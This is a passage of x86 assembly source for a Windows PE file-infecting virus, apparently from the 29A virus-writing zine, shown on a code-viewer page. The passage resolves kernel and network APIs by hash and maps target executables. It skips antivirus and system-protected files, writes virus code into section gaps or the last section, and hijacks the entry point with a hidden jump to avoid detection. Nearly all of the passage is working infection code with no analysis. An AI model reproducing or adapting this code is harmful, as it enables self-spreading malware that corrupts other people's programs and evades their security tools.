📄 29a-7.007
字号:
pop edx
ret
calc_hash16_end:
find_all_exportfunc_end:
db 'KERNEL32'
hash_table equ this word
HASH16 <SetEndOfFile>,hsSetEndOfFile
HASH16 <SetFilePointer>,hsSetFilePointer
HASH16 <CreateFileA>,hsCreateFileA
HASH16 <GetFileAttributesA>,hsGetFileAttributesA
HASH16 <SetFileAttributesA>,hsSetFileAttributesA
HASH16 <CloseHandle>,hsCloseHandle
HASH16 <GetFileTime>,hsGetFileTime
HASH16 <SetFileTime>,hsSetFileTime
HASH16 <GetFileSize>,hsGetFileSize
HASH16 <CreateFileMappingA>,hsCreateFileMappingA
HASH16 <MapViewOfFile>,hsMapViewOfFile
HASH16 <UnmapViewOfFile>,hsUnmapViewOfFile
HASH16 <OpenFileMappingA>,hsOpenFileMappingA
HASH16 <VirtualProtectEx>,hsVirtualProtectEx
HASH16 <ReadProcessMemory>,hsReadProcessMemory
HASH16 <WriteProcessMemory>,hsWriteProcessMemory
HASH16 <OpenProcess>,hsOpenProcess
HASH16 <FindFirstFileA>,hsFindFirstFileA
HASH16 <FindNextFileA>,hsFindNextFileA
HASH16 <FindClose>,hsFindClose
HASH16 <LoadLibraryA>,hsLoadLibraryA
HASH16 <CreateThread>,hsCreateThread
HASH16 <MultiByteToWideChar>,hsMultiByteToWideChar
HASH16 <Sleep>,hsSleep
HASH16 <lstrcmpiA>,hslstrcmpi
HASH16 <GetModuleFileNameA>,hsGetModuleFileNameA
HASH16 <GetDriveTypeA>,hsGetDriveTypeA
HASH16 <GetTickCount>,hsGetTickCount
HASH16 <GetVersion>,hsGetVersion
HASH16 <CreateToolhelp32Snapshot>,hsCreateToolhelp32Snapshot
HASH16 <Process32First>,hsProcess32First
HASH16 <Process32Next>,hsProcess32Next
if DEBUG
HASH16 <OutputDebugStringA>,hsOutputDebugStringA
HASH16 <GetLastError>,hsGetLastError
HASH16 <ExitProcess>,hsExitProcess
endif
dw 0
hash_addr equ this dword
addrSetEndOfFile dd 0
addrSetFilePointer dd 0
addrCreateFileA dd 0
addrGetFileAttributesA dd 0
addrSetFileAttributesA dd 0
addrCloseHandle dd 0
addrGetFileTime dd 0
addrSetFileTime dd 0
addrGetFileSize dd 0
addrCreateFileMappingA dd 0
addrMapViewOfFile dd 0
addrUnmapViewOfFile dd 0
addrOpenFileMappingA dd 0
addrVirtualProtectEx dd 0
addrReadProcessMemory dd 0
addrWriteProcessMemory dd 0
addrOpenProcess dd 0
addrFindFirstFileA dd 0
addrFindNextFileA dd 0
addrFindClose dd 0
addrLoadLibraryA dd 0
addrCreateThread dd 0
addrMultiByteToWideChar dd 0
addrSleep dd 0
addrlstrcmpiA dd 0
addrGetModuleFileNameA dd 0
addrGetDriveTypeA dd 0
addrGetTickCount dd 0
addrGetVersion dd 0
addrCreateToolhelp32Snapshot dd 0
addrProcess32First dd 0
addrProcess32Next dd 0
if DEBUG
addrOutputDebugStringA dd 0
addrGetLastError dd 0
addrExitProcess dd 0
endif
db 'sfc.dll',0
sfc_hash_table equ this word
HASH16 <SfcIsFileProtected>,isSfcIsFileProtected
dw 0
sfc_hash_addr equ this dword
addrSfcIsFileProtected dd 0
db 'MPR.dll',0
mpr_hash_table equ this word
HASH16 <WNetOpenEnumA>,hsWNetOpenEnumA
HASH16 <WNetEnumResourceA>,hsWNetEnumResourceA
HASH16 <WNetCloseEnum>,hsWNetCloseEnum
dw 0
mpr_hash_addr equ this dword
addrWNetOpenEnumA dd 0
addrWNetEnumResourceA dd 0
addrWNetCloseEnum dd 0
db 'USER32.d'
user32_hash_table equ this word
HASH16 <DispatchMessageA>,hsDispatchMessageA
HASH16 <DispatchMessageW>,hsDispatchMessageW
dw 0
user32_hash_addr equ this dword
addrDispatchMessageA dd 0
addrDispatchMessageW dd 0
;***************************Find import APIs end*********************
vir_first_blk_size equ $-_start
;*******************************infect.asm*****************************
;include infect.asm
FOPESP_BASE equ 0
;In--edi->file name,dl=operation code
CALLHEADER file_operate
file_operate:
pushad
call file_op_ip
file_op_ip:
pop ebp
mov ebx,edi
SUBCALL is_in_dllcache,file_op_ip
jz file_op_ret
xor esi,esi
push ebp
lea eax,[ebp+file_op_seh-file_op_ip]
push eax
xor eax,eax
push dword ptr fs:[eax]
mov fs:[eax],esp
push edi
call [ebp+addrGetFileAttributesA-file_op_ip]
push eax ;esp->file attribute
push edi ;esp->file name pointer
test eax,FILE_ATTRIBUTE_READONLY
jz short file_op_not_readonly
and eax,not FILE_ATTRIBUTE_READONLY
push eax
push edi
call [ebp+addrSetFileAttributesA-file_op_ip]
file_op_not_readonly:
push esi
push large FILE_ATTRIBUTE_ARCHIVE or FILE_ATTRIBUTE_HIDDEN
push large OPEN_EXISTING
push esi
push large FILE_SHARE_READ
push large GENERIC_WRITE or GENERIC_READ
push edi
call [ebp+addrCreateFileA-file_op_ip]
inc eax
jz file_op_fail_createfile
dec eax
push eax ;esp->file handle
lea ebx,[ebp+ftime-file_op_ip]
push ebx ;ebx->file last write time
add ebx,8
push ebx
add ebx,8
push ebx
push eax
call [ebp+addrGetFileTime-file_op_ip]
push ecx
push esp ;->file size high
push dword ptr [esp+2*4]
call [ebp+addrGetFileSize-file_op_ip]
pop ecx
inc eax
jz file_op_fail_getfilesize
dec eax
or ecx,ecx
jnz file_op_fail_getfilesize
push eax ;esp->file size
xchg eax,edi
add edi,vir_size+8+1000h ;edi=max file size
push esi
push edi
push esi
push large PAGE_READWRITE
push esi
push dword ptr [esp+5*4+4]
call [ebp+addrCreateFileMappingA-file_op_ip]
or eax,eax
jz file_op_fail_createfilemapping
push eax ; esp->save file mapping handle
push edi
push esi
push esi
push large FILE_MAP_WRITE
push eax
call [ebp+addrMapViewOfFile-file_op_ip]
or eax,eax
jz file_op_fail_mapviewoffile
push eax ;esp->save file mapping base pointer
mov [ebp+file_op_esp-file_op_ip],esp
;************************************************************************
;Now ebp->file_op_ip eax->file base(image base)
;esp->file mapping base address
;esp+4->file mapping handle
;esp+8h->file size
;esp+0ch->file handle
;esp+10h->file name pointer
;esp+14h->file attribute
;Les's begin file operation
;************************************************************************
xchg ebx,eax
SUBCALL check_pe,file_op_ip
jz short file_op_unmapping_jmp1
;Check AV file by look for 'irus' in the file
mov ecx,[esp+8]
cmp ecx,MIN_SIZE_TO_INFECT
jc file_op_unmapping
pushad
add ecx,eax
sub ecx,ebx
sub ecx,8
mov edi,eax
mov eax,'suri' ;V irus
check_av_1:
sub edi,3
scasd
loopnz short check_av_1
or ecx,ecx
popad
jnz short file_op_unmapping_jmpnz
;Let's check whether this file is under file protect,if so,not infect it,avoid WFP error
mov ecx,[ebp+addrSfcIsFileProtected-file_op_ip]
jecxz file_op_check_wfp_end
pushad
;check_wfp:
mov edi,640
sub esp,edi
mov ebx,esp
push ecx
push edi
push ebx ;lpWideCharStr
push -1
push dword ptr [esp+edi+FOPESP_BASE+4*4+8*4+10h]
push large 1 ;MB_PRECOMPOSED
push large 0 ;CP_ACP
call [ebp+addrMultiByteToWideChar-file_op_ip]
pop eax
push esp
push large 0
call eax
add esp,edi
or eax,eax
popad
file_op_unmapping_jmpnz:
jnz file_op_unmapping
file_op_check_wfp_end:
;Check whether it's a WinZip Self-Extractor file
movzx edx,word ptr [eax+14h]
mov edx,[eax+edx+18h+14h+28h] ;ebx->the second section's PointerToRawData
add edx,ebx
cmp dword ptr [edx+10h],'ZniW'
jnz not_winzip
cmp word ptr [edx+10h+4],'pi'
file_op_unmapping_jmp1:
jz file_op_unmapping
not_winzip:
;Check whether the file is a SFX(RAR file)
xor edi,edi
SUBCALL get_section_of_rva,file_op_ip
mov ecx,[edx+0ch]
add ecx,[edx+8]
mov esi,ecx
shr ecx,3
add ecx,esi
cmp ecx,[esp+FOPESP_BASE+8]
jna file_op_unmapping
add esi,ebx ;now ecx->perhaps rar file header
cmp dword ptr [esi],21726152h ;test for rar signature
jz short file_op_unmapping_jmp1
;Check infected
mov edi,[eax+28h]
SUBCALL get_section_of_rva,file_op_ip
sub edi,[edx+4]
add edi,[edx+0ch]
add edi,ebx
lea esi,[ebp+infbuffer-file_op_ip]
mov ecx,[edi]
mov [esi+host_entry_1-_start],ecx
mov cl,[edi+4]
mov [esi+host_entry_2-_start],cl
mov [ebp+entry_point-file_op_ip],edi
cmp byte ptr [edi],0e9h
jnz short check_infected_not_epo
add edi,[edi+1]
add edi,5
check_infected_not_epo:
cmp word ptr [edi-2],INF_SIGN
jnz short check_infected_end
cmp word ptr [edi+3],0h
jz file_op_unmapping_jmp1
check_infected_end:
;For EPO purpose,we must set the code section writable
or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics
lea esi,[ebp+infbuffer-file_op_ip]
mov dword ptr [ebp+blk_min_size-file_op_ip],vir_first_blk_size+8
mov dword ptr [ebp+remaind_size-file_op_ip],vir_size
xor edx,edx
mov [ebp+block_pointer-file_op_ip],edx
cld
first_section:
movzx edx,word ptr [eax+14h]
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
next_section:
add edx,28h
mov ecx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
cmp ecx,edi
jna short file_op_1
xchg edi,ecx
file_op_1:
add ecx,[edx+0ch]
mov edi,vir_first_blk_size+8+38h
call is_final_section
jz short inf_at_tail
mov edi,[edx+28h+0ch]
sub edi,ecx
cmp edi,vir_first_blk_size+8
blk_min_size equ $-4
;NOTE:Next section's PointerToRawData may be 0 or less than current PointerToRawData
;if so,don't use this section.So use jl instead of jc
jl goto_next_section
inf_at_tail:
;Some PE file's .BSS(uninitialized data) and .TLS section's PointerToRawData can be 0,it doesn't take
;disk space.If infect this kind of section,the file will be damaged.So must avoid it.
cmp dword ptr [edx+0ch],0 ;this section's PointerToRawData==0?
jz goto_next_section
xchg edi,ecx
add edi,[esp]
mov dword ptr [edi],0
sub ecx,8
cmp ecx,[ebp+remaind_size-file_op_ip]
jl short file_op_8
mov ecx,[ebp+remaind_size-file_op_ip]
file_op_8:
sub [ebp+remaind_size-file_op_ip],ecx
mov dword ptr [edi+4],ecx
add edi,8
mov ebx,12345678h
block_pointer equ $-4
or ebx,ebx
jz short file_op_7
push edi
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[esp+4]
mov [ebx-8],edi
pop edi
file_op_7:
mov [ebp+block_pointer-file_op_ip],edi
lea ebx,[ebp+infbuffer-file_op_ip+vir_first_blk_size-10h]
cmp esi,ebx ;is first block?
ja file_op_2 ;No
mov word ptr [edi-2],INF_SIGN
or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics
;Check relocation,try to implement EPO
mov ebx,[eax+28h] ;AddressOfEntryPoint
mov [esi+host_entry_rva-_start],ebx ;save host code entry
pushad
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[esp+FOPESP_BASE+8*4]
mov [ebp+redir_entry_point-file_op_ip],edi
add edi,(_start_ip-_start)
mov [esi+host_section_rva-_start],edi ;save host code base
mov ecx,[eax+0a0h] ;Relocation RVA
or ecx,ecx
jz short chk_reloc_end
mov edi,ecx
SUBCALL get_section_of_rva,file_op_ip
sub edi,[edx+4]
add edi,[edx+0ch]
add edi,[esp+FOPESP_BASE+8*4] ;Physical address
mov esi,edi
xor ecx,ecx
next_reloc_trunk:
add esi,ecx
lodsd
mov edx,eax
lodsd
mov ecx,eax
sub ecx,8
clc
or edx,edx
jz short chk_reloc_end
cmp ebx,edx
jc short next_reloc_trunk
push edx
add edx,1000h
cmp ebx,edx
pop edx
ja short next_reloc_trunk
;Found the fit trunk
shr ecx,1
xor eax,eax
mov edi,edx
chk_reloc_1:
lodsw
or eax,eax
jz short chk_reloc_end
and eax,0fffh
add edx,eax
mov eax,ebx
sub eax,3
cmp edx,eax
jc short chk_reloc_2
add eax,8
cmp edx,eax
jc short chk_reloc_3
chk_reloc_2:
mov edx,edi
loop chk_reloc_1
chk_reloc_3:
or ecx,ecx
chk_reloc_end:
popad
mov dword ptr [eax+28h],12345678h
redir_entry_point equ $-4
pushad
jnz short epo_end
mov [eax+28h],ebx ;restore entry point
mov ebx,12345678h
entry_point equ $-4
mov byte ptr [ebx],0e9h
sub edi,[esp+8*4]
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[eax+28h]
sub edi,5
mov [ebx+1],edi
epo_end:
popad
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -